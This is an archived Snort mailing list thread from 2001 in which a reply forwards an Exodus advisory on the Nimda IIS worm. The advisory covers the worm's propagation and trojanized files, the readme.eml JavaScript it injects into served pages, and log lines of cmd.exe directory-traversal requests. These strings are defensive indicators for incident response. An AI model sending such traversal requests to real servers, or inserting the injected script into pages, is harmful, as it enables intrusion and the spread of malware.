Snort mailing list archives
RE: Need help fast!
From: Anthony Geoffron <anthonyg () passinglane com>
Date: Tue, 18 Sep 2001 20:20:55 -0700
Here is an advise from exodus. But at this time it seems there is no information on how to remove this virus once you get compromised. If you guys have any information I would appreciate. Exodus Confidential Customer Communication Date: September 18, 2001 Title: Security Advisory - IIS Worm Summary: Exodus, as a professional courtesy to it's customers, is distributing this Security Threat Advisory. As many of you have probably experienced, there is a new and prolific worm propagating across the Internet. The worm appears to target a large number of well-known vulnerabilities in Microsoft Windows IIS 4 and IIS 5. In addition to targeting Microsoft IIS web servers there is the potential that clients operating non-Microsoft sites will experience denial of service type effects as the worm scans for additional vulnerable hosts. Proposed Remedy: Microsoft patches are available at: http://www.microsoft.com/technet/treeview/default.asp?url=/technet/itsolutio ns/security/default.asp The worm appears to have a number of propagation methods. Infected hosts scan their associated Class "B" address space for additional victims; they also scan open network shares and may populate their served web pages with a snippet of Java code that induces some versions of Microsoft Outlook/Outlook Express to download hostile executable "readme.exe". The code can also propagate via email with the hostile payload bearing the name "readme.exe". An initial analysis of the worm by the Exodus Cyber Attack Team and others within the security community revealed the following details. Victim sites initiate a tftp session with the infecting host and download "admin.dll". Once on the victim system, admin.dll performs a number of actions to include elevating the permissions of both the "guest" and "iuser" accounts to administrator and creating a trojanized version of a number files to include: c:\program files\outlook express\wabmig.exe c:\program files\outlook express\wab.exe. c:\program files\windows nt\pinball\pinball.exe c:\winnt\system32\mspaint.exe. c:\program files\outlook express\msimn.exe. c:\program files\internet explorer\connection wizard\isignup.exe c:\program files\internet explorer\connection wizard\inetwiz.exe. c:\winnt\system32\inetsrv\inetmgr.exe. c:\program files\internet explorer\iexplore.exe. c:\program files\internet explorer\connection wizard\icwconn2.exe. c:\program files\internet explorer\connection wizard\icwconn1.exe. c:\program files\windows nt\dialer.exe. c:\program files\netmeeting\conf.exe. c:\winnt\system32\cmmgr32.exe. The Exodus CAT Team is in the process of analyzing these trojanized files, and additional details regarding these files will be distributed as they are discovered. The worm also creates a file named "readme.eml". On at least one compromised system, the files appeared in the following directories: c:\Inetpub\wwwroot c:\Program Files\Common Files\System\ado c:\Program Files\Microsoft Script Debugger c:\Microsoft Script Debugger\NetMeeting c:\Winnt\Help\debug c:\Winnt\Help\iishelp c:\Winnt\Help\iishelp\iis c:\Winnt\system32\inetsrv\iisadmin A number of websites are reporting the addition of the following snippet of code to their pages: </body> </html> <html><script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script></html> The readme.eml file appears to facilitate the downloading of the hostile code by older versions of Outlook and Outlook Express. Until additional details about this worm are known, Exodus is recommending that any infected host be pulled off the network. Sites operating Microsoft IIS web servers that have not yet been infected should be patched immediately through the most recent Microsoft Security Advisory. All users in your enterprise should be apprised of the threat and notified of the potential risk associated with any attachments labeled "readme.exe ". A review of the IIS logs for a targeted server may display some or all of the following entries: GET /scripts/root.exe?/c+dir GET /MSADC/root.exe?/c+dir GET /c/winnt/system32/cmd.exe?/c+dir GET /d/winnt/system32/cmd.exe?/c+dir GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir GET /msadc/..%5c../..%5c../..%5c/..\xc1\x1c../..\xc1\x1c../..\xc1\x1c../wi nnt/system32/cmd.exe?/c+dir GET /scripts/..\xc1\x1c../winnt/system32/cmd.exe?/c+dir GET /scripts/..\xc0/../winnt/system32/cmd.exe?/c+dir GET /scripts/..\xc0\xaf../winnt/system32/cmd.exe?/c+dir GET /scripts/..\xc1\x9c../winnt/system32/cmd.exe?/c+dir GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir Should you have any questions, or need any assistance please feel free to contact our Response Center at 1-877-393-7878. Exodus does not guarantee or warrant that the information and recommendations set forth in this advisory will enable customers to stop the worm from propagating or operate a completely secure or error-free Internet site. Exodus makes no warranty or guarantee as to suitability or efficacy of any vendor supplied software patches. Respectfully, Exodus Communications, Inc. "The Infrastructure for the Digital Economy" Exodus Confidential Customer Communications Web: <http://www.exodus.net> -----Original Message----- From: Sheahan, Paul (PCLN-NW) [mailto:Paul.Sheahan () priceline com] Sent: Tuesday, September 18, 2001 4:10 PM To: Snort List (E-mail) Subject: [Snort-users] Need help fast! Importance: High Hello, Once on Thursday I noticed an outgoing telnet connection attempt on port 23 from my web server out to the Internet. Two days later I noticed an outgoing TFTP connection attempt (port 69) from the web same server out to the Internet. I've never seen these type of connection attempts before and they are definitely NOT a good sign. But even more strange is that Snort logs an alert for these connection attempts, but does NOT log any traces! I have never seen Snort do this before. Whenever there is an alert, there has ALWAYS been a corresponding trace to refer to. But for each of these connection attempts, I have nothing to refer to. I'm using Snort 1.8.1 b78 on Red Hat Linux 7.0. My questions for the group are: * Has anyone seen any unexplained telnet or tftp coming from any of their servers lately? Possibly from the new w32.nimda.a.mm worm? * Also, could this problem be a bug in Snort where it isn't logging traces properly all of the time? It logs traces fine for all of my other alerts. Thanks, Paul _______________________________________________ Snort-users mailing list Snort-users () lists sourceforge net Go to this URL to change user options or unsubscribe: https://lists.sourceforge.net/lists/listinfo/snort-users Snort-users list archive: http://www.geocrawler.com/redir-sf.php3?list=snort-users _______________________________________________ Snort-users mailing list Snort-users () lists sourceforge net Go to this URL to change user options or unsubscribe: https://lists.sourceforge.net/lists/listinfo/snort-users Snort-users list archive: http://www.geocrawler.com/redir-sf.php3?list=snort-users
Current thread:
- Need help fast! Sheahan, Paul (PCLN-NW) (Sep 18)
- <Possible follow-ups>
- RE: Need help fast! Anthony Geoffron (Sep 18)